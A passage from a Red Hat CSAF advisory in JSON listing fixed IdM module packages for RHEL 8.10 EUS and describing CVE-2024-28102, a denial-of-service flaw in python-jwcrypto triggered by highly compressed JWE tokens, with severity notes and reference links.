"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "JWCrypto: denail of service Via specifically crafted JWE"
},
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
